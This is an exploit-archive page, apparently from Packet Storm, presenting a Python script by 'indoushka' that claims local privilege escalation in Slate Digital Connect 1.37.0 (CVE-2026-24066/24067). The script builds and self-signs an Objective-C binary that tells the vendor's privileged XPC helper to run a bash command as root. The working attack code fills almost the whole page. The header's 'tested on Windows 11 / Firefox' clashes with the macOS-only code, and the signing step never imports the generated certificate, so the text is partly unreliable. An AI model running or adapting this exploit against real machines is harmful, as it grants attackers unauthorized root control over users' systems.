Share
## https://sploitus.com/exploit?id=PACKETSTORM:225165
==================================================================================================================================
| # Title : Slate Digital Connect 1.37.0 Local Privilege Escalation Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://slatedigital.com/ |
==================================================================================================================================
[+] Summary : This Python script is a local privilege escalation exploit targeting Slate Digital Connect (CVE-2026-24066 and CVE-2026-24067).
[+] Payload :
#!/usr/bin/env python3
import os
import sys
import subprocess
import tempfile
import shutil
class SlateExploit:
def __init__(self):
self.cwd = os.getcwd()
self.tmp_dir = tempfile.mkdtemp()
def create_certificate(self):
"""Create signing certificate"""
print("[*] Creating signing certificate...")
openssl_cmds = [
"openssl genrsa -out codesign.key 4096",
f"openssl req -new -x509 -key codesign.key -out codesign.crt -days 3650 -subj '/CN=My Self Signed Code Cert/OU=3F5JHDQ8FZ/O=Test Org/C=US' -addext 'keyUsage=digitalSignature' -addext 'extendedKeyUsage=codeSigning'",
"openssl pkcs12 -export -inkey codesign.key -in codesign.crt -out codesign.p12 -passout pass:"
]
for cmd in openssl_cmds:
subprocess.run(cmd, shell=True, cwd=self.tmp_dir, check=True)
print("[+] Certificate created successfully")
def compile_exploit(self):
"""Compile exploit code"""
print("[*] Compiling exploit code...")
exploit_code = '''
#import <Foundation/Foundation.h>
#import <xpc/xpc.h>
int main() {
@autoreleasepool {
xpc_connection_t conn = xpc_connection_create_mach_service(
"com.slatedigital.connect.privileged.helper.tool2",
dispatch_get_main_queue(),
XPC_CONNECTION_MACH_SERVICE_PRIVILEGED
);
xpc_connection_resume(conn);
xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_string(msg, "command", "/bin/bash -c 'id > /tmp/slate_root.txt'");
xpc_dictionary_set_string(msg, "action", "execute");
xpc_connection_send_message(conn, msg);
sleep(2);
}
return 0;
}
'''
exploit_file = os.path.join(self.tmp_dir, 'exploit.m')
with open(exploit_file, 'w') as f:
f.write(exploit_code)
subprocess.run(
f'clang -o {self.tmp_dir}/exploit {self.tmp_dir}/exploit.m -framework Foundation',
shell=True, check=True
)
print("[+] Exploit compiled successfully")
def sign_exploit(self):
"""Sign the exploit with the certificate"""
print("[*] Signing the exploit...")
cert_name = "My Self Signed Code Cert"
exploit_path = os.path.join(self.tmp_dir, 'exploit')
subprocess.run(
f'codesign --sign "{cert_name}" --force {exploit_path}',
shell=True, check=True
)
print("[+] Exploit signed successfully")
def run_exploit(self):
"""Run the exploit"""
print("[*] Running the exploit...")
exploit_path = os.path.join(self.tmp_dir, 'exploit')
os.chmod(exploit_path, 0o755)
result = subprocess.run(exploit_path, capture_output=True, text=True)
print(result.stdout)
if os.path.exists('/tmp/slate_root.txt'):
with open('/tmp/slate_root.txt', 'r') as f:
print(f"\n[+] Executed as root:\n{f.read()}")
else:
print("[-] Execution failed - maybe patched or service does not exist")
def cleanup(self):
"""Clean up temporary files"""
print("[*] Cleaning up temporary files...")
shutil.rmtree(self.tmp_dir, ignore_errors=True)
def exploit(self):
"""Execute the full attack"""
print("""
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Slate Digital Connect - Local Privilege Escalation โ
โ CVE-2026-24066 & CVE-2026-24067 โ
โ By indoushka โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
""")
try:
self.create_certificate()
self.compile_exploit()
self.sign_exploit()
self.run_exploit()
except Exception as e:
print(f"[-] Error: {e}")
finally:
self.cleanup()
if __name__ == "__main__":
exploit = SlateExploit()
exploit.exploit()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================